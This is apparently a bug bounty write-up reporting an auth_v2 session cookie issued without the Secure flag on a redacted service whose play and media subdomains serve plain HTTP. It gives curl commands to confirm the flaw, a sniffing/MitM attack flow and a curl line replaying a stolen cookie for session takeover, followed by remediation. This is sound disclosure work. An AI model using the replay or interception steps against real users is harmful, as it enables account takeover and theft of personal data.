writeups
highSelfhosted Iranian Bug Bounty ProgramCWE-614 (Sensitive Cookie in HTTPS Session Without 'Secure' Attribute)

Session Cookie Transmitted Over HTTP Due to Missing `Secure` Flag

3 min read

Target: play.[REDACTED], media.[REDACTED] (in-scope) CVSS v3.1 Score: 7.4 (High) CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N


Summary#

The authentication session cookie auth_v2, which is scoped to domain=.[REDACTED], is issued without the Secure flag. Two in-scope subdomains, play.[REDACTED] and media.[REDACTED], serve content over plain HTTP without redirecting to HTTPS. As a result, a network-positioned attacker (on the same LAN, a rogue access point, or via ISP-level interception) can capture the auth_v2 session cookie in cleartext HTTP traffic and impersonate the victim.


Impact#

  • Account takeover: Stolen auth_v2 grants full authenticated access to the victim's [TARGET] account (subscription, watch history, personal information, payment-linked profile).
  • Passive attack: No user interaction beyond normal usage of the player or media features is required once the attacker is network-positioned.
  • Scope of exposure: Because the cookie is domain=.[REDACTED], it is sent to ALL *.[REDACTED] subdomains over HTTP, not just the two confirmed subdomains.

Affected Components#

HostHTTP StatusHTTPS RedirectNotes
play.[REDACTED]200 OK over HTTPNoneVideo player SPA
media.[REDACTED]200 OK over HTTPNoneMedia delivery

Cookie issued by: www.[REDACTED]/api/v1.0/accounts/login/by-anonymous and any authenticated endpoint.


Response header from POST https://www.[REDACTED]/api/v1.0/accounts/login/by-anonymous:

code
set-cookie: auth_v2=[REDACTED]; domain=.[REDACTED]; expires=Mon, 22-Jun-2026 ...; path=/; HttpOnly

Missing attribute: `Secure`

HTTP response from play.[REDACTED] (no TLS negotiation, no redirect):

http
GET / HTTP/1.1
Host: play.[REDACTED]

HTTP/1.1 200 OK
Server: [REDACTED]-Edge
Content-Type: text/html

Steps to Reproduce#

Prerequisites#

  • Attacker positioned on the same network as the victim (LAN, Wi-Fi hotspot, or ISP-level).
  • Victim has an account with an active auth_v2 session cookie.

Attack Flow#

Step 1: Victim visits https://www.[REDACTED] and authenticates. Cookie is set:

code
auth_v2=<session_token>; domain=.[REDACTED]; path=/; HttpOnly

Step 2: Victim later visits http://play.[REDACTED] or http://media.[REDACTED] (directly, via link, or via HTTP redirect from another page). The browser sends auth_v2 in cleartext since the Secure flag is absent and the subdomain is served over HTTP.

Step 3: Attacker captures the HTTP request via passive sniffing (tcpdump, Wireshark) or active MitM (arpspoof + mitmproxy):

code
GET / HTTP/1.1
Host: play.[REDACTED]
Cookie: auth_v2=[REDACTED]   <- stolen in cleartext

Step 4: Attacker replays the cookie against https://www.[REDACTED]:

bash
curl -sk -H "Cookie: auth_v2=<stolen_token>" https://www.[REDACTED]/api/v1.0/account/profiles
# Returns victim's account profiles -> confirmed session takeover

PoC Commands#

bash
# Confirm play.[REDACTED] serves HTTP without redirect
curl -v --max-time 10 "http://play.[REDACTED]/" 2>&1 | grep "< HTTP"
# Expected: HTTP/1.1 200 OK  (no redirect to HTTPS)

# Confirm media.[REDACTED] serves HTTP without redirect
curl -v --max-time 10 "http://media.[REDACTED]/" 2>&1 | grep "< HTTP"
# Expected: HTTP/1.1 200 OK

# Confirm auth_v2 is issued without Secure flag
curl -si -X POST \
  -H "Content-Type: application/json" \
  -d '{}' \
  "https://www.[REDACTED]/api/v1.0/accounts/login/by-anonymous" \
  | grep -i "set-cookie"
# Expected: set-cookie: auth_v2=...; domain=.[REDACTED]; path=/; HttpOnly
# Note: NO "secure" keyword in the cookie attributes

Tools Used#

  • curl (v8.11.1): HTTP request crafting and header inspection
  • dig: DNS resolution

Activities Log#

Time (UTC)Activity
2026-05-23 12:48HTTP status check on all in-scope hosts
2026-05-23 12:48Response header inspection (Server, Set-Cookie, security headers)
2026-05-23 12:55Confirmed play.[REDACTED] serves HTTP 200 with no redirect
2026-05-23 12:52Confirmed auth_v2 cookie issued without Secure flag
2026-05-23 12:55Confirmed media.[REDACTED] serves HTTP 200 with no redirect

No accounts were accessed. No cookie was used for actual authentication. Only passive enumeration of HTTP headers was performed.


  1. Add the Secure attribute to auth_v2: Set-Cookie: auth_v2=...; domain=.[REDACTED]; path=/; Secure; HttpOnly; SameSite=Lax
  2. Enforce HTTPS-only on play.[REDACTED] and media.[REDACTED] with a 301 redirect from HTTP.
  3. Add Strict-Transport-Security header to all in-scope hosts.